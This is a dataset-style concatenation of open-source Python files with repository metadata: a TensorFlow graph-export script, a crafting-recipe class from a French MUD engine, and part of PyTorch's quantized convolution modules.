tf.app.flags.DEFINE_string(
'output_file', '', 'Where to save the resulting file to.')
tf.app.flags.DEFINE_string(
'dataset_dir', '', 'Directory to save intermediate dataset files to')
FLAGS = tf.app.flags.FLAGS
def main(_):
if not FLAGS.output_file:
raise ValueError('You must supply the path to save to with --output_file')
tf.logging.set_verbosity(tf.logging.INFO)
with tf.Graph().as_default() as graph:
dataset = dataset_factory.get_dataset(FLAGS.dataset_name, 'validation',
FLAGS.dataset_dir)
preprocessing_name = FLAGS.model_name
image_preprocessing_fn = preprocessing_factory.get_preprocessing(
preprocessing_name,
is_training=False)
network_fn = nets_factory.get_network_fn(
FLAGS.model_name,
num_classes=(dataset.num_classes - FLAGS.labels_offset),
is_training=FLAGS.is_training)
if hasattr(network_fn, 'default_image_size'):
image_size = network_fn.default_image_size
else:
image_size = FLAGS.default_image_size
# placeholder = tf.placeholder(name='input', dtype=tf.float32,
# shape=[1, image_size, image_size, 3])
placeholder = tf.placeholder(name='input', dtype=tf.string)
image = tf.image.decode_jpeg(placeholder, channels=3)
image = image_preprocessing_fn(image, image_size, image_size)
image = tf.expand_dims(image, 0)
network_fn(image)
graph_def = graph.as_graph_def()
with gfile.GFile(FLAGS.output_file, 'wb') as f:
f.write(graph_def.SerializeToString())
if __name__ == '__main__':
tf.app.run()
| [
"jinluyuan@vip.qq.com"
] | jinluyuan@vip.qq.com |
ffee569c636d7a39e30d79887b2ae06f32ae5544 | e3365bc8fa7da2753c248c2b8a5c5e16aef84d9f | /indices/pennatula.py | 68acd65eab6d7430d81c725ac0c105e54266c3bb | [] | no_license | psdh/WhatsintheVector | e8aabacc054a88b4cb25303548980af9a10c12a8 | a24168d068d9c69dc7a0fd13f606c080ae82e2a6 | refs/heads/master | 2021-01-25T10:34:22.651619 | 2015-09-23T11:54:06 | 2015-09-23T11:54:06 | 42,749,205 | 2 | 3 | null | 2015-09-23T11:54:07 | 2015-09-18T22:06:38 | Python | UTF-8 | Python | false | false | 44 | py | ii = [('RogePAV2.py', 2), ('RogePAV.py', 6)] | [
"prabhjyotsingh95@gmail.com"
] | prabhjyotsingh95@gmail.com |
7ecec0f8ce1a77817d1d3f1b5be71e05c68dac13 | e82b3c6000fe8e4639d6606f9d3605e75a8a5d5c | /src/secondaires/crafting/recette.py | 8cb0d2ffbe27e770852aa4faf11fc68101ad3017 | [
"BSD-3-Clause"
] | permissive | vincent-lg/tsunami | 804585da7bd1d159ad2c784b39f801963ca73c03 | 7e93bff08cdf891352efba587e89c40f3b4a2301 | refs/heads/master | 2022-08-02T15:54:35.480614 | 2022-07-18T12:06:41 | 2022-07-18T12:06:41 | 25,605,543 | 5 | 2 | BSD-3-Clause | 2019-06-05T15:59:08 | 2014-10-22T21:34:10 | Python | UTF-8 | Python | false | false | 11,391 | py | # -*-coding:Utf-8 -*
# Copyright (c) 2010-2017 LE GOFF Vincent
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Fichier contenant la classe Recette, détaillée plus bas."""
from abstraits.obase import BaseObj
from primaires.format.fonctions import supprimer_accents
from primaires.scripting.script import Script
class Recette(BaseObj):
"""Classe représentant une recette artisanale.
Une recette est une combinaison d'objets ou de types utilisés
pour former un résultat. Par exemple, de la fourrure en assez
grande quantité et des bandes de cuir peuvent former un sac.
La sélection de la bonne recette se fait en fonction des objets
ou types. Une recette peut par exemple demander qu'on utilise
de la fourrure (ce qui est un type d'objet), n'importe quelle
fourrure peut faire l'affaire, ou bien de la fourrure de lapin
précisément.
En terme d'attribut d'objet, on utilise deux dictionnaires,
un pour les objets précis, l'autre pour les types.
"""
nom_scripting = "la recette"
def __init__(self, rang):
"""Constructeur de la fiche."""
BaseObj.__init__(self)
self.rang = rang
self.nom = ""
self.nb_max = 1
self.ingredients_objets = {}
self.ingredients_types = {}
self.resultat = ""
self.quantite = 1
self.script = ScriptRecette(self)
self._construire()
def __getnewargs__(self):
return (None, )
def __repr__(self):
return "<Recette pour {}>".format(self.resultat)
def __str__(self):
return "recette pour {}".format(repr(self.resultat))
@property
def description(self):
msg = ""
if self.nom:
msg = self.nom + " pour "
msg += self.resultat + "("
premier = True
# Affichage des types
for cle, (qtt_min, qtt_max) in self.ingredients_types.items():
qtt = qtt_min if qtt_min == qtt_max else "{}-{}".format(
qtt_min, qtt_max)
if premier:
premier = False
else:
msg += ", "
msg += "type {} X {}".format(cle, qtt)
# Affichage des objets
for cle, (qtt_min, qtt_max) in self.ingredients_objets.items():
qtt = qtt_min if qtt_min == qtt_max else "{}-{}".format(
qtt_min, qtt_max)
if premier:
premier = False
else:
msg += ", "
msg += "objet {} X {}".format(cle, qtt)
msg += ")"
return msg
def peut_faire(self, personnage, ingredients):
"""Vérifie si la liste des ingrédients fait la recette.
Pour chaque ingrédient, on vérifie son type et sa clé.
L'un d'eux doit se trouver dans les besoins de la recette.
Notez que si il y a trop d'ingrédients, cette recette
n'est pas sélectionnée.
"""
ingredients = list(ingredients)
guilde = self.rang.guilde
rec_evt = self.script["valide"]
guilde_evt = guilde.script["recette"]["valide"]
if guilde_evt.nb_lignes > 0:
guilde_evt.executer(personnage=personnage, ingredients=ingredients,
recette=self.resultat)
try:
valide = guilde_evt.espaces.variables["valide"]
except KeyError:
raise ValueError("la variable 'valide' n'est apparemment " \
"pas définie")
return bool(valide)
elif rec_evt.nb_lignes > 0:
rec_evt.executer(personnage=personnage, ingredients=ingredients)
try:
valide = evt.espaces.variables["valide"]
except KeyError:
raise ValueError("la variable 'valide' n'est apparemment " \
"pas définie")
return bool(valide)
types = self.ingredients_types.copy()
types_min = dict((t, q) for t, (q, x) in types.items())
types_max = dict((t, x - q) for t, (q, x) in types.items() if \
x - q > 0)
objets = self.ingredients_objets.copy()
objets_min = dict((o, q) for o, (q, x) in objets.items())
objets_max = dict((o, x - q) for o, (q, x) in objets.items() if \
x - q > 0)
for ingredient in list(ingredients):
cle = ingredient.cle
nom_type = ingredient.nom_type
if cle in objets_min:
objets_min[cle] -= 1
if objets_min[cle] <= 0:
del objets_min[cle]
elif cle in objets_max:
objets_max[cle] -= 1
if objets_max[cle] <= 0:
del objets_max[cle]
elif nom_type in types_min:
types_min[nom_type] -= 1
if types_min[nom_type] <= 0:
del types_min[nom_type]
elif nom_type in types_max:
types_max[nom_type] -= 1
if types_max[nom_type] <= 0:
del types_max[nom_type]
else:
return False
ingredients.remove(ingredient)
if types_min == {} and objets_min == {} and ingredients == []:
# L'attente a été remplie
return True
return False
def creer_resultat(self, personnage, ingredients):
"""Créé la recette et retourne l'objet créé."""
if not self.peut_faire(personnage, ingredients):
raise ValueError("Les ingrédients {} ne peuvent pas être " \
"utilisés pour cette recette {}".format(
ingredients, repr(self.resultat)))
prototype = importeur.objet.prototypes[self.resultat]
objets = []
for i in range(self.quantite):
objets.append(importeur.objet.creer_objet(prototype))
# Transfert des attributs
attributs = {}
for ingredient in ingredients:
prototype = ingredient.prototype
attrs = importeur.crafting.configuration[prototype].attributs
if attrs:
attributs.update(attrs)
attrs = importeur.crafting.configuration[ingredient].attributs
if attrs:
attributs.update(attrs)
sa_attributs = {}
for cle, valeur in attributs.items():
sa_attributs[supprimer_accents(cle).lower()] = valeur
for objet in objets:
importeur.crafting.configuration[objet].attributs = dict(
sa_attributs)
# Copie des attributs dans le nom
for attribut, valeur in sa_attributs.items():
objet.nom_singulier = objet.nom_singulier.replace(
"${}".format(attribut), valeur)
objet.nom_pluriel = objet.nom_pluriel.replace(
"${}".format(attribut), valeur)
personnage.salle.objets_sol.ajouter(objet)
self.script["fabrique"].executer(personnage=personnage,
objet=objet, ingredients=ingredients)
for ingredient in ingredients:
importeur.objet.supprimer_objet(ingredient.identifiant)
return objets
class ScriptRecette(Script):
"""Script et évènements propres aux recettes."""
def init(self):
"""Initialisation du script"""
# Événement fabrique
evt_fabrique = self.creer_evenement("fabrique")
evt_fabrique.aide_courte = "la recette est fabriquée"
evt_fabrique.aide_longue = \
"Cet évènement est appelé quand un personnage fabrique " \
"la recette. Elle est appelée après la fabrication de " \
"la recette et permet de personnaliser l'objet créé " \
"depuis les ingrédients (variable 'objet'). Les " \
"ingrédients sont aussi disponibles dans la variable " \
"'ingredients'."
# Configuration des variables de l'évènement fabrique
var_perso = evt_fabrique.ajouter_variable("personnage", "Personnage")
var_perso.aide = "le personnage fabriquant la recette"
var_objet = evt_fabrique.ajouter_variable("objet", "Objet")
var_objet.aide = "l'objet créé par la recette"
var_ingredients = evt_fabrique.ajouter_variable("ingredients", "list")
var_ingredients.aide = "la liste des ingrédients (liste d'objets)"
# Événement valide
evt_valide = self.creer_evenement("valide")
evt_valide.aide_courte = "la recette est-elle valide ?"
evt_valide.aide_longue = \
"Cet évènement permet de configurer de façon plus précise " \
"le fait qu'une recette est valide ou non. Elle permet " \
"d'outre-passer les ingrédients précisés dans la recette, " \
"pour utiliser des critères plus spécifiques, par exemple, " \
"ou bien chercher d'autres ingrédients ailleurs. Un exemple " \
"concret pourrait être de limiter le nombre d'ingrédients " \
"en fonction de leur poids et pas de leur quantité. Si " \
"cet évènement ne contient aucune instruction, les objets " \
"et types définis dans la recette sont utilisés pour " \
"savoir si elle est valide. Sinon, cet évènement est " \
"appelé. La variable 'valide' doit être créée : elle " \
"doit avoir une valeur de |ent|1|ff| pour indiquer que " \
"la recette a bien été validée, |ent|0|ff| sinon."
# Configuration des variables de l'évènement valide
var_perso = evt_valide.ajouter_variable("personnage", "Personnage")
var_perso.aide = "le personnage fabriquant la recette"
var_ingredients = evt_valide.ajouter_variable("ingredients", "list")
var_ingredients.aide = "la liste des ingrédients (liste d'objets)"
| [
"vincent.legoff.srs@gmail.com"
] | vincent.legoff.srs@gmail.com |
ddd546a4eb1f6fea8aac981c9f1ba18b18698851 | 2baeb9965f64214e5a1478ab5139c53bb363ff50 | /torch/nn/quantized/modules/conv.py | 99a0f969739ae231a6e42f28a57f3925a28ddd6d | [
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"BSL-1.0",
"Apache-2.0"
] | permissive | Dithn/pytorch | b327d9a7434a0dbadb7bbf148b22cef7d2e4bc1c | 86399d8e0cb72dfd1501fb9be870ac29af38e241 | refs/heads/master | 2023-04-26T12:01:26.043128 | 2021-11-16T19:54:14 | 2021-11-16T19:55:40 | 207,961,157 | 1 | 0 | NOASSERTION | 2021-11-17T02:14:51 | 2019-09-12T03:58:02 | C++ | UTF-8 | Python | false | false | 35,148 | py | # coding=utf-8
r"""Quantized convolution modules."""
from typing import Optional, List, TypeVar
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.nn.intrinsic as nni
import torch.nn.intrinsic.qat as nniqat
from torch._ops import ops
from torch.nn.common_types import _size_1_t
from torch.nn.modules.utils import _single, _pair, _triple
from torch.nn.quantized.modules.utils import _quantize_weight
from torch.nn.utils import fuse_conv_bn_weights
_SUPPORTED_PADDING = {
'zeros',
'reflect'
}
def _reverse_repeat_padding(padding: List[int]) -> List[int]:
_reversed_padding_repeated_twice: List[int] = []
N = len(padding)
for idx in range(N):
for _ in range(2):
_reversed_padding_repeated_twice.append(padding[N - idx - 1])
return _reversed_padding_repeated_twice
class _ConvNd(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, stride=1,
padding=0, dilation=1, groups=1, bias=True,
padding_mode='zeros', device=None, dtype=None):
# All subclasses have this signature - See PR #49702s
raise NotImplementedError
def _init(self, in_channels, out_channels, kernel_size, stride,
padding, dilation,
transposed, output_padding,
groups, bias,
padding_mode='zeros',
device=None,
dtype=None) -> None:
factory_kwargs = {'device': device, 'dtype': dtype}
super(_ConvNd, self).__init__()
if in_channels % groups != 0:
raise ValueError('in_channels must be divisible by groups')
if out_channels % groups != 0:
raise ValueError('out_channels must be divisible by groups')
self.in_channels = in_channels
self.out_channels = out_channels
self.kernel_size = kernel_size
self.stride = stride
self.padding = padding
self.dilation = dilation
self.transposed = transposed
self.output_padding = output_padding
self.groups = groups
if padding_mode not in _SUPPORTED_PADDING:
raise ValueError("'padding_mode' {} is not supported by quantized convolution".format(padding_mode))
self.padding_mode = padding_mode
# Initialize as NCHW. set_weight will internally transpose to NHWC.
if self.transposed:
weight_shape = [in_channels, out_channels // self.groups]
else:
weight_shape = [out_channels, in_channels // self.groups]
qweight = torch._empty_affine_quantized(
weight_shape + list(kernel_size),
scale=1, zero_point=0, dtype=torch.qint8,
**{k: v for k, v in factory_kwargs.items() if k != 'dtype'})
bias_float = (
torch.zeros(out_channels, dtype=torch.float,
**{k: v for k, v in factory_kwargs.items() if k != 'dtype'}) if bias else None)
self.set_weight_bias(qweight, bias_float)
self.scale = 1.0
self.zero_point = 0
def set_weight_bias(self, qweight, bias_float):
raise NotImplementedError
def bias(self):
raise NotImplementedError
def _weight_bias(self):
raise NotImplementedError
def extra_repr(self):
s = ('{in_channels}, {out_channels}, kernel_size={kernel_size}'
', stride={stride}, scale={scale}, zero_point={zero_point}')
if self.padding != (0,) * len(self.padding):
s += ', padding={padding}'
if self.dilation != (1,) * len(self.dilation):
s += ', dilation={dilation}'
if self.output_padding != (0,) * len(self.output_padding):
s += ', output_padding={output_padding}'
if self.groups != 1:
s += ', groups={groups}'
if self.bias() is None:
s += ', bias=False'
return s.format(**self.__dict__)
# ===== Serialization methods =====
# The special consideration here is that we have to unpack the weights into
# their regular QTensor form for serialization. Packed weights should not
# live outside the process in which they were created, rather they should be
# derived from the QTensor weight.
# self
# |--- weight : Tensor
# |--- bias : Tensor
#
# TODO: maybe change to this when https://github.com/pytorch/pytorch/pull/32958 is landed
# self
# |--- _packed_params : Conv2dPackedParamsBase or Conv3dPackedParamsBase
def _save_to_state_dict(self, destination, prefix, keep_vars):
super(_ConvNd, self)._save_to_state_dict(destination, prefix, keep_vars)
(w, b) = self._weight_bias()
destination[prefix + 'weight'] = w
destination[prefix + 'bias'] = b
destination[prefix + 'scale'] = torch.tensor(self.scale)
destination[prefix + 'zero_point'] = torch.tensor(self.zero_point)
@torch.jit.export
def __getstate__(self):
(w, b) = self._weight_bias()
return (
self.in_channels,
self.out_channels,
self.kernel_size,
self.stride,
self.padding,
self.dilation,
self.transposed,
self.output_padding,
self.groups,
self.padding_mode,
w,
b,
self.scale,
self.zero_point,
self.training
)
# ===== Deserialization methods =====
# Counterpart to the serialization methods, we must pack the serialized
# QTensor weight into its packed format for use by the FBGEMM ops.
def _load_from_state_dict(self, state_dict, prefix, local_metadata, strict,
missing_keys, unexpected_keys, error_msgs):
self.set_weight_bias(
state_dict[prefix + 'weight'], state_dict[prefix + 'bias'])
state_dict.pop(prefix + 'weight')
state_dict.pop(prefix + 'bias')
self.scale = float(state_dict[prefix + 'scale'])
state_dict.pop(prefix + 'scale')
self.zero_point = int(state_dict[prefix + 'zero_point'])
state_dict.pop(prefix + 'zero_point')
super(_ConvNd, self)._load_from_state_dict(
state_dict, prefix, local_metadata, False, missing_keys,
unexpected_keys, error_msgs)
@torch.jit.export
def __setstate__(self, state):
self.in_channels = state[0]
self.out_channels = state[1]
self.kernel_size = state[2]
self.stride = state[3]
self.padding = state[4]
self.dilation = state[5]
self.transposed = state[6]
self.output_padding = state[7]
self.groups = state[8]
self.padding_mode = state[9]
self.set_weight_bias(state[10], state[11])
self.scale = state[12]
self.zero_point = state[13]
self.training = state[14]
def __deepcopy__(self, memo):
new_instance = type(self).__new__(type(self))
torch.nn.Module.__init__(new_instance)
state = self.__getstate__()
new_instance.__setstate__(state)
return new_instance
def __copy__(self):
return self.__deepcopy__({})
@classmethod
def get_qconv(cls, mod, activation_post_process, weight_post_process=None):
r"""Creates a qconv object and returns it.
"""
if weight_post_process is None:
weight_post_process = mod.qconfig.weight()
weight_post_process(mod.weight)
assert weight_post_process.dtype == torch.qint8, \
'Weight observer must have a dtype of qint8'
qweight = _quantize_weight(mod.weight.float(), weight_post_process)
# the __init__ call used is the one from derived classes and not the one from _ConvNd
qconv = cls(mod.in_channels, mod.out_channels, mod.kernel_size,
mod.stride, mod.padding, mod.dilation, mod.groups,
mod.bias is not None, mod.padding_mode)
qconv.set_weight_bias(qweight, mod.bias)
if activation_post_process is None or activation_post_process.dtype == torch.float:
return qconv # dynamic quantization doesn't need scale/zero_point
else:
act_scale, act_zp = activation_post_process.calculate_qparams()
qconv.scale = float(act_scale)
qconv.zero_point = int(act_zp)
return qconv
@staticmethod
def from_float(cls, mod):
if hasattr(mod, "weight_fake_quant"):
# assert type(mod) == cls.__QAT_MODULE, " nnq." + cls.__name__ + \
# ".from_float only works for " + cls.__QAT_MODULE.__name__
if type(mod) == cls._NNIQAT_CONV_BN_MODULE:
mod.weight, mod.bias = fuse_conv_bn_weights(
mod.weight, mod.bias, mod.bn.running_mean, mod.bn.running_var,
mod.bn.eps, mod.bn.weight, mod.bn.bias)
assert hasattr(mod, "activation_post_process"), \
"Input QAT module must have observer attached"
weight_post_process = mod.weight_fake_quant
activation_post_process = mod.activation_post_process
else:
assert type(mod) == cls._FLOAT_MODULE, \
" nnq." + cls.__name__ + ".from_float only works for " + \
cls._FLOAT_MODULE.__name__ + " but got:" + str(type(mod))
assert hasattr(mod, "qconfig"), \
"Input float module must have qconfig defined."
activation_post_process = None if not hasattr(
mod, "activation_post_process") else mod.activation_post_process
if type(mod) == cls._NNI_CONV_RELU_MODULE:
mod = mod[0]
weight_post_process = mod.qconfig.weight()
return cls.get_qconv(mod, activation_post_process, weight_post_process)
class Conv1d(_ConvNd):
r"""Applies a 1D convolution over a quantized input signal composed of
several quantized input planes.
For details on input arguments, parameters, and implementation see
:class:`~torch.nn.Conv1d`.
.. note::
Only `zeros` is supported for the :attr:`padding_mode` argument.
.. note::
Only `torch.quint8` is supported for the input data type.
Attributes:
weight (Tensor): packed tensor derived from the learnable weight
parameter.
scale (Tensor): scalar for the output scale
zero_point (Tensor): scalar for the output zero point
See :class:`~torch.nn.Conv1d` for other attributes.
Examples::
>>> m = nn.quantized.Conv1d(16, 33, 3, stride=2)
>>> input = torch.randn(20, 16, 100)
>>> # quantize input to quint8
>>> q_input = torch.quantize_per_tensor(input, scale=1.0, zero_point=0,
dtype=torch.quint8)
>>> output = m(q_input)
"""
_FLOAT_MODULE = nn.Conv1d
_NNIQAT_CONV_BN_MODULE = nniqat.ConvBn1d
_NNI_CONV_RELU_MODULE = nni.ConvReLU1d
def __init__(self,
in_channels: int,
out_channels: int,
kernel_size: _size_1_t,
stride: _size_1_t = 1,
padding: _size_1_t = 0,
dilation: _size_1_t = 1,
groups: int = 1,
bias: bool = True,
padding_mode: str = 'zeros',
device=None,
dtype=None):
factory_kwargs = {'device': device, 'dtype': dtype}
kernel_size = _single(kernel_size)
stride = _single(stride)
padding = padding if isinstance(padding, str) else _single(padding)
dilation = _single(dilation)
# Subclasses of _ConvNd needs to call _init rather than __init__. See
# discussion on PR #49702
super(Conv1d, self)._init(
in_channels, out_channels, kernel_size, stride, padding, dilation,
False, _single(0), groups, bias, padding_mode, **factory_kwargs)
def _get_name(self):
return 'QuantizedConv1d'
def set_weight_bias(self, w: torch.Tensor, b: Optional[torch.Tensor]) -> None:
if self.padding_mode == 'zeros':
self._packed_params = torch.ops.quantized.conv1d_prepack(
w, b, self.stride, self.padding, self.dilation, self.groups)
else:
self._packed_params = torch.ops.quantized.conv1d_prepack(
w, b, self.stride, _pair(0), self.dilation,
self.groups)
def _weight_bias(self):
w, b = torch.ops.quantized.conv1d_unpack(self._packed_params)
return w, b
def weight(self):
return self._weight_bias()[0]
def bias(self):
return self._weight_bias()[1]
def forward(self, input):
# Temporarily using len(shape) instead of ndim due to JIT issue
# https://github.com/pytorch/pytorch/issues/23890
if len(input.shape) != 3:
raise ValueError("Input shape must be `(N, C, L)`!")
if self.padding_mode != 'zeros':
# Padding in Conv1d is stored as (p, p), need to get (p,)
_reversed_padding_repeated_twice = _reverse_repeat_padding(self.padding[:1])
input = F.pad(input, _reversed_padding_repeated_twice,
mode=self.padding_mode)
return ops.quantized.conv1d(input, self._packed_params, self.scale, self.zero_point)
@classmethod
def from_float(cls, mod):
r"""Creates a quantized module from a float module or qparams_dict.
Args:
mod (Module): a float module, either produced by torch.ao.quantization
utilities or provided by the user
"""
return _ConvNd.from_float(cls, mod)
class Conv2d(_ConvNd):
r"""Applies a 2D convolution over a quantized input signal composed of
several quantized input planes.
For details on input arguments, parameters, and implementation see
:class:`~torch.nn.Conv2d`.
.. note::
Only `zeros` is supported for the :attr:`padding_mode` argument.
.. note::
Only `torch.quint8` is supported for the input data type.
Attributes:
weight (Tensor): packed tensor derived from the learnable weight
parameter.
scale (Tensor): scalar for the output scale
zero_point (Tensor): scalar for the output zero point
See :class:`~torch.nn.Conv2d` for other attributes.
Examples::
>>> # With square kernels and equal stride
>>> m = nn.quantized.Conv2d(16, 33, 3, stride=2)
>>> # non-square kernels and unequal stride and with padding
>>> m = nn.quantized.Conv2d(16, 33, (3, 5), stride=(2, 1), padding=(4, 2))
>>> # non-square kernels and unequal stride and with padding and dilation
>>> m = nn.quantized.Conv2d(16, 33, (3, 5), stride=(2, 1), padding=(4, 2), dilation=(3, 1))
>>> input = torch.randn(20, 16, 50, 100)
>>> # quantize input to quint8
>>> q_input = torch.quantize_per_tensor(input, scale=1.0, zero_point=0, dtype=torch.quint8)
>>> output = m(q_input)
"""
_FLOAT_MODULE = nn.Conv2d
_NNIQAT_CONV_BN_MODULE = nniqat.ConvBn2d
_NNI_CONV_RELU_MODULE = nni.ConvReLU2d
def __init__(self, in_channels, out_channels, kernel_size, stride=1,
padding=0, dilation=1, groups=1, bias=True,
padding_mode='zeros', device=None, dtype=None):
factory_kwargs = {'device': device, 'dtype': dtype}
kernel_size = _pair(kernel_size)
stride = _pair(stride)
padding = _pair(padding)
dilation = _pair(dilation)
# Subclasses of _ConvNd need to call _init rather than __init__. See
# discussion on PR #49702
super(Conv2d, self)._init(
in_channels, out_channels, kernel_size, stride, padding, dilation,
False, _pair(0), groups, bias, padding_mode, **factory_kwargs)
def _get_name(self):
return 'QuantizedConv2d'
def set_weight_bias(self, w: torch.Tensor, b: Optional[torch.Tensor]) -> None:
if self.padding_mode == 'zeros':
self._packed_params = torch.ops.quantized.conv2d_prepack(
w, b, self.stride, self.padding, self.dilation, self.groups)
else:
self._packed_params = torch.ops.quantized.conv2d_prepack(
w, b, self.stride, _pair(0), self.dilation, self.groups)
def _weight_bias(self):
return self._packed_params.unpack()
def weight(self):
return self._weight_bias()[0]
def bias(self):
return self._weight_bias()[1]
def forward(self, input):
# Temporarily using len(shape) instead of ndim due to JIT issue
# https://github.com/pytorch/pytorch/issues/23890
if len(input.shape) != 4:
raise ValueError("Input shape must be `(N, C, H, W)`!")
if self.padding_mode != 'zeros':
_reversed_padding_repeated_twice = _reverse_repeat_padding(self.padding)
input = F.pad(input, _reversed_padding_repeated_twice,
mode=self.padding_mode)
return ops.quantized.conv2d(
input, self._packed_params, self.scale, self.zero_point)
@classmethod
def from_float(cls, mod):
r"""Creates a quantized module from a float module or qparams_dict.
Args:
mod (Module): a float module, either produced by torch.ao.quantization
utilities or provided by the user
"""
return _ConvNd.from_float(cls, mod)
class Conv3d(_ConvNd):
r"""Applies a 3D convolution over a quantized input signal composed of
several quantized input planes.
For details on input arguments, parameters, and implementation see
:class:`~torch.nn.Conv3d`.
.. note::
Only `zeros` is supported for the :attr:`padding_mode` argument.
.. note::
Only `torch.quint8` is supported for the input data type.
Attributes:
weight (Tensor): packed tensor derived from the learnable weight
parameter.
scale (Tensor): scalar for the output scale
zero_point (Tensor): scalar for the output zero point
See :class:`~torch.nn.Conv3d` for other attributes.
Examples::
>>> # With square kernels and equal stride
>>> m = nn.quantized.Conv3d(16, 33, 3, stride=2)
>>> # non-square kernels and unequal stride and with padding
>>> m = nn.quantized.Conv3d(16, 33, (3, 5, 5), stride=(1, 2, 2), padding=(1, 2, 2))
>>> # non-square kernels and unequal stride and with padding and dilation
>>> m = nn.quantized.Conv3d(16, 33, (3, 5, 5), stride=(1, 2, 2), padding=(1, 2, 2), dilation=(1, 2, 2))
>>> input = torch.randn(20, 16, 56, 56, 56)
>>> # quantize input to quint8
>>> q_input = torch.quantize_per_tensor(input, scale=1.0, zero_point=0, dtype=torch.quint8)
>>> output = m(q_input)
"""
_FLOAT_MODULE = nn.Conv3d
_NNIQAT_CONV_BN_MODULE = nniqat.ConvBn3d
_NNI_CONV_RELU_MODULE = nni.ConvReLU3d
def __init__(self, in_channels, out_channels, kernel_size, stride=1,
padding=0, dilation=1, groups=1, bias=True,
padding_mode='zeros', device=None, dtype=None):
assert padding_mode != 'reflect', "Conv3d does not support reflection padding"
factory_kwargs = {'device': device, 'dtype': dtype}
kernel_size = _triple(kernel_size)
stride = _triple(stride)
padding = _triple(padding)
dilation = _triple(dilation)
# Subclasses of _ConvNd need to call _init rather than __init__. See
# discussion on PR #49702
super(Conv3d, self)._init(
in_channels, out_channels, kernel_size, stride, padding, dilation,
False, _triple(0), groups, bias, padding_mode, **factory_kwargs)
def _get_name(self):
return 'QuantizedConv3d'
def set_weight_bias(self, w: torch.Tensor, b: Optional[torch.Tensor]) -> None:
if self.padding_mode == 'zeros':
self._packed_params = torch.ops.quantized.conv3d_prepack(
w, b, self.stride, self.padding, self.dilation, self.groups)
else:
self._packed_params = torch.ops.quantized.conv3d_prepack(
w, b, self.stride, _triple(0), self.dilation, self.groups)
def _weight_bias(self):
return self._packed_params.unpack()
def weight(self):
return self._weight_bias()[0]
def bias(self):
return self._weight_bias()[1]
def forward(self, input):
# Temporarily using len(shape) instead of ndim due to JIT issue
# https://github.com/pytorch/pytorch/issues/23890
if len(input.shape) != 5:
raise ValueError("Input shape must be `(N, C, D, H, W)`!")
if self.padding_mode != 'zeros':
_reversed_padding_repeated_twice = _reverse_repeat_padding(self.padding)
input = F.pad(input, _reversed_padding_repeated_twice,
mode=self.padding_mode)
return ops.quantized.conv3d(
input, self._packed_params, self.scale, self.zero_point)
@classmethod
def from_float(cls, mod):
r"""Creates a quantized module from a float module or qparams_dict.
Args:
mod (Module): a float module, either produced by torch.ao.quantization
utilities or provided by the user
"""
return _ConvNd.from_float(cls, mod)
# === Transposed Convolutions ===
MOD = TypeVar('MOD', bound=nn.modules.conv._ConvNd)
class _ConvTransposeNd(_ConvNd):
_FLOAT_MODULE = MOD
def __init__(self, in_channels, out_channels, kernel_size, stride,
padding, dilation, transposed, output_padding,
groups, bias, padding_mode, device=None, dtype=None):
if padding_mode != 'zeros':
raise ValueError('Only "zeros" padding mode is supported for {}'.format(self.__class__.__name__))
factory_kwargs = {'device': device, 'dtype': dtype}
# Subclasses of _ConvNd need to call _init rather than __init__. See
# discussion on PR #49702
super(_ConvTransposeNd, self)._init(
in_channels, out_channels, kernel_size, stride,
padding, dilation, transposed, output_padding,
groups, bias, padding_mode, **factory_kwargs)
def _input_padding(self, kernel_size: List[int], dilation: List[int], padding: List[int]) -> List[int]:
res = torch.jit.annotate(List[int], [])
for kdx in range(len(kernel_size)):
pad = (dilation[kdx] * (kernel_size[kdx] - 1) - padding[kdx])
res.append(pad)
return res
@classmethod
def from_float(cls, mod):
r"""Creates a quantized module from a float module or qparams_dict.
Args:
mod (Module): a float module, either produced by torch.ao.quantization
utilities or provided by the user
"""
# derived classes override cls._FLOAT_MODULE attribute
msg = ' nnq.' + cls.__name__ + '.from_float only works for ' + \
cls._FLOAT_MODULE.__name__ # type: ignore[attr-defined]
assert type(mod) == cls._FLOAT_MODULE, msg
assert hasattr(mod, 'qconfig'), \
'Input float module must have qconfig defined.'
weight_post_process = mod.qconfig.weight()
weight_post_process(mod.weight)
assert weight_post_process.dtype == torch.qint8, \
'Weight observer must have a dtype of qint8'
qweight = _quantize_weight(mod.weight.float(), weight_post_process)
# the __init__ call used is the one from derived classes and not the one from _ConvTransposeNd
qconv = cls(mod.in_channels, mod.out_channels, mod.kernel_size, # type: ignore[call-arg]
mod.stride, mod.padding, mod.output_padding, mod.groups,
mod.bias is not None, mod.dilation, mod.padding_mode)
qconv.set_weight_bias(qweight, mod.bias)
if not hasattr(mod, "activation_post_process") or mod.activation_post_process.dtype == torch.float:
return qconv # dynamic quantization doesn't need scale/zero_point
else:
act_scale, act_zp = mod.activation_post_process.calculate_qparams()
qconv.scale = float(act_scale)
qconv.zero_point = int(act_zp)
return qconv
class ConvTranspose1d(_ConvTransposeNd):
r"""Applies a 1D transposed convolution operator over an input image
composed of several input planes.
